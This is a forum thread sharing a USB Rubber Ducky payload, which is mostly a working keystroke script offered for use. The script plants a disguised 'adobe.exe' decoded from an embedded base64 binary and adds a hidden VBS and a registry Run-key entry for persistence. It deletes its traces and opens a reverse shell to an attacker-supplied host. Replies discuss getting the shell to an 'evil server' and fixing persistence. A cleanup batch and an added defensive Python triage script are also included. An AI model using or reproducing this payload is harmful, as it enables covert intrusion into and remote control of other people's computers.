
[Payload] Reverse Shell (dirty Version)


russianmonk


Well, I wanted to make the original Reverse Shell script a little more useful for "remote administration". I wrote a batch file of this a while ago, so I figured I would use it on the Ducky... worked perfectly. Basically it makes it so the file is in \windows\system32 and makes it run at startup. It first creates runwinupdate.vbs (this allows the command to start the remote program at boot in a hidden cmd window). Next it creates a reg key that runs the vbs script on boot. Then it deletes the reg file after adding it to the registry. Next it creates winupdate.bat, which has the command to run the remote program at start. (I also renamed remote.exe to adobe.exe... a little more sneaky.) At the bottom of the code I put a little "cleanup" bat file code. Makes it easier if you are testing it, instead of having to delete everything one by one. Any questions or suggestions, let me know!

***If this description doesn't make sense, sorry... I'm tired***

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
STRING copy con c:\windows\system32\runwinupdate.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL Z
ENTER
STRING copy con c:\windows\system32\dirty.reg
ENTER
STRING REGEDIT4
ENTER
STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ENTER
STRING "windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs"
ENTER
CTRL Z
ENTER
STRING REGEDIT /s dirty.reg
ENTER
STRING del dirty.reg
ENTER
STRING copy con c:\windows\system32\winupdate.bat
ENTER
STRING @echo off
ENTER
STRING cd /D c:\windows\system32
ENTER
STRING adobe.exe "INSERT YOUR INFO HERE" 8080
ENTER
CTRL Z
ENTER
STRING copy con c:\windows\system32\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
STRING copy con c:\windows\system32\adobeupdate.txt
ENTER
STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
ENTER
STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
ENTER
STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ENTER
STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
ENTER
STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
ENTER
STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
ENTER
STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
ENTER
STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
ENTER
STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
ENTER
STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
ENTER
STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
ENTER
STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
ENTER
STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
ENTER
STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
ENTER
STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
ENTER
STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
ENTER
STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
ENTER
STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
ENTER
STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
ENTER
STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
ENTER
STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
ENTER
STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
ENTER
STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
ENTER
CTRL z
ENTER
STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe
ENTER
STRING del c:\windows\system32\decoder.vbs
ENTER
STRING del c:\windows\system32\adobeupdate.txt
ENTER
STRING c:\windows\system32\adobe.exe "INSERT YOUR INFO HERE" 8080
ENTER
STRING exit
ENTER



Cleanup
Run this in a bat file if you wanna clean up the files

@echo off
rem Remove the decoded binary and the two launcher files the payload writes
del c:\windows\system32\adobe.exe
del c:\windows\system32\winupdate.bat
rem (not created by the payload above; harmless if the file is absent)
del c:\windows\system32\runwinupdate.bat
del c:\windows\system32\runwinupdate.vbs
rem Remove the Run value; /f skips the "Delete the registry value? (Yes/No)" prompt
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsupdates /f
pause
Edited by midnitesnake
correct formatting
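As an added analyst-side example (not code from the original post or from any Ducky tooling), the Python below replays the STRING / ENTER / CTRL Z keystrokes of a payload like the one above, reconstructs every file it would write through `copy con`, and pulls the Run-key persistence out of any dropped REGEDIT4 file, so a responder knows exactly which paths and registry values to look for on an affected host. The embedded SAMPLE_PAYLOAD is a constructed, shortened copy of the first two `copy con` sessions above with the base64 blob left out; the function names, the `script_launcher` heuristic and the `dropped_by_payload` cross-check are this example's own.

```python
"""Triage helper: replay a Ducky-style payload's STRING/ENTER/CTRL Z keystrokes,
reconstruct the files it writes with `copy con`, and report Run-key persistence
from any dropped REGEDIT4 file. Added example, not code from the original post."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Heuristic for this example: Run values ending in these launch a script, not a binary.
SCRIPT_LAUNCHER_EXT = (".vbs", ".bat", ".cmd", ".js", ".ps1")

# Constructed sample: the first two copy con sessions from the post, base64 blob omitted.
SAMPLE_PAYLOAD = r"""
STRING cmd
ENTER
STRING copy con c:\windows\system32\runwinupdate.vbs
ENTER
STRING Set WshShell = CreateObject("WScript.Shell")
ENTER
STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0
ENTER
STRING Set WshShell = Nothing
ENTER
CTRL Z
ENTER
STRING copy con c:\windows\system32\dirty.reg
ENTER
STRING REGEDIT4
ENTER
STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
ENTER
STRING "windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs"
ENTER
CTRL Z
ENTER
STRING REGEDIT /s dirty.reg
ENTER
"""


@dataclass
class DroppedFile:
    path: str
    content: str


def reconstruct_dropped_files(script: str) -> list[DroppedFile]:
    """Return the files `copy con` would write; DELAY, MENU and other keys are ignored."""
    files, buffer, current_path = [], [], None
    awaiting_cmd_enter = False  # the ENTER that submits `copy con` is not file content
    for raw in script.splitlines():
        line = raw.strip()  # note: trailing spaces inside a STRING are lost here
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "STRING":
            if current_path is None:
                m = re.match(r"copy\s+con\s+(\S+)", arg, re.IGNORECASE)
                if m:
                    current_path, buffer, awaiting_cmd_enter = m.group(1), [], True
            else:
                buffer.append(arg)  # STRING without ENTER continues the same line
        elif cmd == "ENTER" and current_path is not None:
            if awaiting_cmd_enter:
                awaiting_cmd_enter = False
            else:
                buffer.append("\n")
        elif cmd == "CTRL" and arg.upper() == "Z" and current_path is not None:
            files.append(DroppedFile(current_path, "".join(buffer)))  # Ctrl-Z closes copy con
            current_path = None
    return files


def run_key_entries(reg_text: str) -> list[tuple[str, str, str]]:
    """Return (key, value_name, command) for string values under any ...\\Run key."""
    entries, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and key.upper().endswith("\\RUN"):
            m = re.match(r'"([^"]+)"="(.*)"$', line)
            if m:  # .reg files escape backslashes; undo that to get the real path
                entries.append((key, m.group(1), m.group(2).replace("\\\\", "\\")))
    return entries


def triage(script: str) -> dict:
    """Summarise dropped paths and Run-key persistence, flagging script launchers."""
    files = reconstruct_dropped_files(script)
    dropped = {f.path.lower() for f in files}
    persistence = []
    for f in files:
        if not f.content.lstrip().upper().startswith("REGEDIT4"):
            continue
        for key, name, command in run_key_entries(f.content):
            persistence.append({
                "key": key, "value": name, "command": command,
                "script_launcher": command.lower().endswith(SCRIPT_LAUNCHER_EXT),
                "dropped_by_payload": command.lower() in dropped,
            })
    return {"dropped": [f.path for f in files], "persistence": persistence}


if __name__ == "__main__":
    print(triage(SAMPLE_PAYLOAD))
```

On the sample this reports two dropped files and one Run value, `windowsupdates`, whose command is a `.vbs` that the same payload wrote, which is the combination worth alerting on: a Run entry that launches a script from `system32` rather than a signed binary.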


The script's goal is quite admirable and awesome, and I'm very interested in getting it to work. Unfortunately I'm having trouble getting persistence out of this script. It works great during the session after I plug in the Ducky - I get the reverse shell onto my evil server - but after reboot it never comes back up (yes, I'm killing netcat and bringing it back up between reboots). I check HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run on my target machine and there's no entry for winupdate.bat. Instead there's just an entry for Microsoft Security Essentials and the obligatory Default. Any thoughts on why this would be? My only experience doing registry hacks was back in Win98, making the Start button say "FU" instead of Start lol...

Any help would be greatly appreciated as always

telot



Just FYI. The Social Engineering Toolkit has payloads for teensy/ducky in a menu driven interface.

Do you know if these payloads are kept up to date?

Thanks
